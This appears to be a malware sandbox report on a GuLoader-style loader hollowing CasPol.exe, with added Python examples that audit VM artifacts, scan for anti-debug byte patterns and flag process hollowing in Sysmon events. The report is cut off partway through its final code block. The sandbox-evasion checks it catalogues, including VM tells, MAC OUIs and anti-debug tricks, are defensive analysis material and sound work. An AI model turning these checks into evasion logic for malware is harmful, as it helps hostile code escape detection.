Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsi5456.tmp
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb, source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: MsMpCom.pdb source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: Binary string: MsMpCom.pdbGCTL source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr

Data Obfuscation

Source: Yara match File source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.4202992291.0000000000D50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC30C0 push eax; ret 1_2_70AC30EE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3735 push 00000074h; ret 1_2_033B377B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3F12 push ecx; iretd 1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B7F9B push esi; retn 9F97h 1_2_033B801C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3BF1 push 00000066h; iretd 1_2_033B3BF3
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B664F push 764D0892h; retf 1_2_033B6654
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3EE6 push ecx; iretd 1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B88AA push BF000001h; iretd 1_2_033B88AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCE8E67 push edi; retn 0000h 6_2_1FCE8E69
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_70AC1BFF
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\MsMpCom.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX (80 identical events)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\file.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 404 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9558
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpCom.dll
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AD722 rdtsc 1_2_033AD722
Source: C:\Users\user\Desktop\file.exe Code function: K32EnumDeviceDrivers, 1_2_033BEE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000006.00000003.5393884407.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9084665856.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C13
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040683D FindFirstFileW,FindClose, 1_2_0040683D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
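Every check in this section maps to something the analysis guest exposes: the QEMU guest-agent binaries under Program Files, the Hyper-V integration services (vmicshutdown, vmicvss, vmicheartbeat and the rest of the vmic* family), and the Win32_Processor, Win32_BaseBoard and Win32_NetworkAdapterConfiguration classes the sample pulls over WMI. The audit below is an added example, not part of the report, the sandbox or the malware: it takes those same facts as plain Python values so it runs offline, and on a real guest you would fill them from the file system, the service list and Get-CimInstance. The QEMU paths and Hyper-V service names follow the report; the vendor substrings and the MAC OUI table are this example's own lists and are a starting heuristic, not the sample's exact logic.

```python
from typing import Dict, Iterable, List, Tuple

# Artifacts the sample probes, as listed in the report.
QEMU_AGENT_PATHS = {r"c:\program files\qemu-ga\qemu-ga.exe", r"c:\program files\qga\qga.exe"}
HYPERV_SERVICES = {"vmicshutdown", "vmicrdv", "vmicvss", "vmicvmsession", "vmictimesync",
                   "vmickvpexchange", "vmicheartbeat", "vmicguestinterface"}

# This example's own heuristics (not from the report): substrings that betray a
# hypervisor in WMI vendor fields, and MAC OUIs assigned to virtual NICs.
VM_MARKERS = ("virtual", "vmware", "virtualbox", "vbox", "qemu", "kvm", "xen", "bochs", "hyper-v")
VM_OUIS = {"00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware", "00:50:56": "VMware",
           "08:00:27": "VirtualBox", "52:54:00": "QEMU/KVM", "00:15:5d": "Hyper-V", "00:16:3e": "Xen"}

Finding = Tuple[str, str]  # (check that would trip, offending value)


def audit(existing_paths: Iterable[str], services: Iterable[str],
          baseboard: Dict[str, str], processor: Dict[str, object],
          mac_addresses: Iterable[str]) -> List[Finding]:
    """Report which of the sample's evasion checks this guest would fail."""
    findings: List[Finding] = []
    present = {p.lower() for p in existing_paths}
    for path in sorted(QEMU_AGENT_PATHS & present):
        findings.append(("file:qemu_guest_agent", path))
    for svc in sorted(HYPERV_SERVICES & {s.lower() for s in services}):
        findings.append(("service:hyperv_integration", svc))
    for field in ("Manufacturer", "Product"):            # Win32_BaseBoard
        value = str(baseboard.get(field, ""))
        if any(m in value.lower() for m in VM_MARKERS):
            findings.append((f"wmi:Win32_BaseBoard.{field}", value))
    name = str(processor.get("Name", ""))                # Win32_Processor
    if any(m in name.lower() for m in VM_MARKERS):
        findings.append(("wmi:Win32_Processor.Name", name))
    if int(processor.get("NumberOfCores", 0)) < 2:       # a single vCPU is a common sandbox tell
        findings.append(("wmi:Win32_Processor.NumberOfCores", str(processor.get("NumberOfCores"))))
    for mac in mac_addresses:                            # Win32_NetworkAdapterConfiguration
        oui = mac.lower().replace("-", ":")[:8]
        if oui in VM_OUIS:
            findings.append((f"wmi:MACAddress.{VM_OUIS[oui]}", mac))
    return findings


# Constructed inputs: a default QEMU/Hyper-V style guest, and one with the tells removed.
LEAKY_GUEST = dict(
    existing_paths=[r"C:\Program Files\Qemu-ga\qemu-ga.exe", r"C:\Windows\System32\notepad.exe"],
    services=["wuauserv", "vmicheartbeat", "vmicshutdown", "vmicvss"],
    baseboard={"Manufacturer": "Microsoft Corporation", "Product": "Virtual Machine"},
    processor={"Name": "QEMU Virtual CPU version 2.5+", "NumberOfCores": 1},
    mac_addresses=["52:54:00:12:34:56"],
)
HARDENED_GUEST = dict(
    existing_paths=[r"C:\Windows\System32\notepad.exe"],
    services=["wuauserv", "Spooler"],
    baseboard={"Manufacturer": "ASUSTeK COMPUTER INC.", "Product": "PRIME B450M-A"},
    processor={"Name": "AMD Ryzen 5 3600 6-Core Processor", "NumberOfCores": 4},
    mac_addresses=["D8:BB:C1:0A:1B:2C"],
)

if __name__ == "__main__":
    for check, value in audit(**LEAKY_GUEST):
        print(f"{check:<40} {value}")
    print("hardened guest findings:", audit(**HARDENED_GUEST))
```

The long sleeps in the same section (a single delay of 922337203685477 ms and a loop of 9558 short delays) are not something a guest can hide; they are handled on the sandbox side by clock acceleration or by patching the delay, which is why this audit covers only the artifact checks.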

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_70AC1BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BDB04 mov eax, dword ptr fs:[00000030h] 1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BC7B0 mov eax, dword ptr fs:[00000030h] 1_2_033BC7B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5BFF mov eax, dword ptr fs:[00000030h] 1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B562F mov eax, dword ptr fs:[00000030h] 1_2_033B562F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E6F mov ebx, dword ptr fs:[00000030h] 1_2_033B5E6F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E59 mov ebx, dword ptr fs:[00000030h] 1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5E59 mov eax, dword ptr fs:[00000030h] 1_2_033B5E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B12AA mov eax, dword ptr fs:[00000030h] 1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5D06 mov eax, dword ptr fs:[00000030h] 1_2_033B5D06
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5DCF mov eax, dword ptr fs:[00000030h] 1_2_033B5DCF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5C4E mov eax, dword ptr fs:[00000030h] 1_2_033B5C4E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BC0A6 mov eax, dword ptr fs:[00000030h] 1_2_033BC0A6
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AD722 rdtsc 1_2_033AD722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063E990 LdrInitializeThunk, 6_2_2063E990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard
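The push/ret sequences listed under Data Obfuscation and the fs:[30h] PEB reads and rdtsc listed here are short, fixed byte patterns, so an analyst can locate and count them in a dump of the unpacked region (the 033Bxxxx addresses in file.exe) without a disassembler. The scanner below is an added example written for this page, not code from the report or the sample. The opcode encodings are standard 32-bit x86; the sample buffer is constructed to contain exactly the instructions the report lists, bracketed by a benign prologue and epilogue that must not match, and the base address passed when printing is arbitrary. A real run would pass the dumped bytes and the region's load address instead.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# ret | retf | iretd | retn imm16: every "return" the report's push/ret pairs end with
_RET_TAIL = rb"(?:\xC3|\xCB|\xCF|\xC2..)"

# Byte patterns for the instruction families the report flags (32-bit encodings).
PATTERNS: Dict[str, "re.Pattern[bytes]"] = {
    # mov r32, dword ptr fs:[30h]: loads the PEB, where BeingDebugged (+2),
    # NtGlobalFlag (+0x68) and the process-heap flags are read by anti-debug code.
    "peb_read": re.compile(
        rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00", re.DOTALL),
    # rdtsc: cycle-counter timing check (single-stepping or an emulator inflates the delta).
    "rdtsc": re.compile(rb"\x0F\x31"),
    # push <reg|imm> ; ret-family: a computed jump that hides the real control flow
    # from static call-graph recovery.
    "push_reg_ret": re.compile(rb"[\x50-\x57]" + _RET_TAIL, re.DOTALL),
    "push_imm8_ret": re.compile(rb"\x6A." + _RET_TAIL, re.DOTALL),
    "push_imm32_ret": re.compile(rb"\x68.{4}" + _RET_TAIL, re.DOTALL),
}

Hit = Tuple[int, str, str]  # (address, pattern name, matched bytes as hex)


def scan(buf: bytes, base: int = 0) -> List[Hit]:
    """Return every pattern hit in buf, sorted by address; base is the region's load address."""
    hits: List[Hit] = []
    for name, pat in PATTERNS.items():
        for m in pat.finditer(buf):
            hits.append((base + m.start(), name, m.group().hex(" ")))
    return sorted(hits)


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per pattern; several push/ret pairs in one small region is the obfuscation signal."""
    return dict(Counter(name for _, name, _ in hits))


# Constructed test buffer: a benign prologue/epilogue wrapped around the exact
# instructions the report lists (not a dump of the real sample).
SAMPLE_REGION = bytes.fromhex(
    "55 8B EC"              # push ebp ; mov ebp, esp        (benign, must not match)
    "64 A1 30 00 00 00"     # mov eax, dword ptr fs:[30h]   (PEB read)
    "0F B6 40 02"           # movzx eax, byte ptr [eax+2]   (PEB.BeingDebugged)
    "64 8B 1D 30 00 00 00"  # mov ebx, dword ptr fs:[30h]   (PEB read, ModRM form)
    "0F 31"                 # rdtsc
    "6A 74 C3"              # push 74h ; ret
    "56 C2 97 9F"           # push esi ; retn 9F97h
    "68 92 08 4D 76 CB"     # push 764D0892h ; retf
    "51 CF"                 # push ecx ; iretd
    "5D C3"                 # pop ebp ; ret                 (benign, must not match)
)

if __name__ == "__main__":
    for addr, name, raw in scan(SAMPLE_REGION, base=0x033B3700):
        print(f"{addr:08X}  {name:<15} {raw}")
    print(summarize(scan(SAMPLE_REGION)))
```

Two-byte patterns such as push reg / ret will also match inside data and across instruction boundaries, so treat the per-region density reported by summarize() as the signal rather than any single hit, and confirm interesting addresses in a disassembler.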

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D50000
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7
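The process tree recorded earlier in the report and repeated in this section (file.exe launching CasPol.exe four times with file.exe's own command line, then writing into CasPol.exe at base D50000) is the process-hollowing pattern GuLoader uses to run the AgentTesla payload inside a Microsoft-signed .NET binary. The following is an added detection example written for this page, not code from the report, the sandbox or the sample. It applies three heuristics to constructed events whose field names follow Sysmon Event ID 1 (process creation) and Event ID 10 (process access), which is where a SOC would see the same facts; the list of .NET utilities, the user-writable path fragments and the access-mask bits are this example's own choices.

```python
from typing import Dict, List

# .NET framework utilities that get hollowed because they are Microsoft-signed,
# live under %windir% and will run whatever image is mapped into them.
DOTNET_LOLBINS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe",
                  "msbuild.exe", "applaunch.exe", "aspnet_compiler.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\")
PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x0008, 0x0020   # access-mask bits needed to write foreign memory


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def first_token(cmdline: str) -> str:
    """Program token of a Windows command line, honouring a quoted first argument."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def _stem(name: str) -> str:
    return name[:-4] if name.endswith(".exe") else name


def analyze(events: List[Dict]) -> List[Dict]:
    """Apply three hollowing heuristics to Sysmon-style ProcessCreate (1) and ProcessAccess (10) events."""
    alerts: List[Dict] = []
    for ev in events:
        if ev["EventID"] == 1:
            image = basename(ev["Image"])
            claimed = basename(first_token(ev["CommandLine"]))
            parent = ev["ParentImage"].lower()
            # A hollowed process is created (suspended) with the loader's own command
            # line, so the command line names a different binary than the mapped image.
            if claimed and _stem(claimed) != _stem(image):
                alerts.append({"rule": "cmdline_image_mismatch", "image": image, "claimed": claimed})
            # CasPol.exe and friends have no business being launched from a user-writable path.
            if image in DOTNET_LOLBINS and any(m in parent for m in USER_WRITABLE):
                alerts.append({"rule": "dotnet_lolbin_from_user_path", "image": image, "parent": parent})
        elif ev["EventID"] == 10:
            mask = int(ev["GrantedAccess"], 16)
            needed = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
            if basename(ev["TargetImage"]) in DOTNET_LOLBINS and (mask & needed) == needed:
                alerts.append({"rule": "write_access_to_dotnet_lolbin",
                               "source": basename(ev["SourceImage"]), "access": hex(mask)})
    return alerts


# Constructed events mirroring the report's process tree (field names follow Sysmon).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\user\Desktop\file.exe",
     "CommandLine": r'"C:\Users\user\Desktop\file.exe"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "CommandLine": r'"C:\Users\user\Desktop\file.exe"', "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"EventID": 10, "SourceImage": r"C:\Users\user\Desktop\file.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", "GrantedAccess": "0x1FFFFF"},
    # Benign controls: an administrator running CasPol from a shell, and csrss querying it.
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
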